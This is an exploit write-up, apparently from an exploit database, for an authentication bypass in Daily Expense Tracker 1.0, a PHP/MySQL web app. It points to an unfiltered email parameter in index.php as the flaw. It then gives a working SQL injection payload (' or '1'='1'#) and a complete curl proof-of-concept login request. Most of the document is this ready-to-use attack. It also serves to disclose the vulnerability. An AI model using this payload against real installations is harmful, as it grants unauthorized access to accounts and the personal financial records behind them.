# Exploit Title: Daily Expense Tracker 1.0 - Authentication Bypass
# Date: 2020-07-20
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/daily-expense-tracker-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10013
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)


Vulnerable File:
---------------- 
/index.php


Vulnerable Code:
-----------------
line 8: $email=$_POST['email'];


Vulnerable Issue:
-----------------
$email=$_POST['email']; is not filtered correcty on the server side


Payload:
--------
'email=saya%40saya.com' or '1'='1'#&password=1234&login=login'


Sample POC Request:
-------------------

curl -i -s -k --location --request POST 'http://localhost/dets/' \
--header 'Origin: http://localhost:88' \
--header 'Cookie: PHPSESSID=dht4cn59hq6020vulephs36qr5' \
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36' \
--header 'Referer: http://localhost:88/dets/' \
--header 'Connection: close' \
--header 'Sec-Fetch-Site: same-origin' \
--header 'Sec-Fetch-Dest: document' \
--header 'Host: localhost:88' \
--header 'Accept-Encoding: gzip, deflate' \
--header 'Sec-Fetch-Mode: navigate' \
--header 'Cache-Control: max-age=0' \
--header 'Upgrade-Insecure-Requests: 1' \
--header 'Sec-Fetch-User: ?1' \
--header 'Accept-Language: en-US,en;q=0.9' \
--header 'Content-Length: 60' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-raw 'email=saya%40saya.com' or '1'='1'#&password=1234&login=login'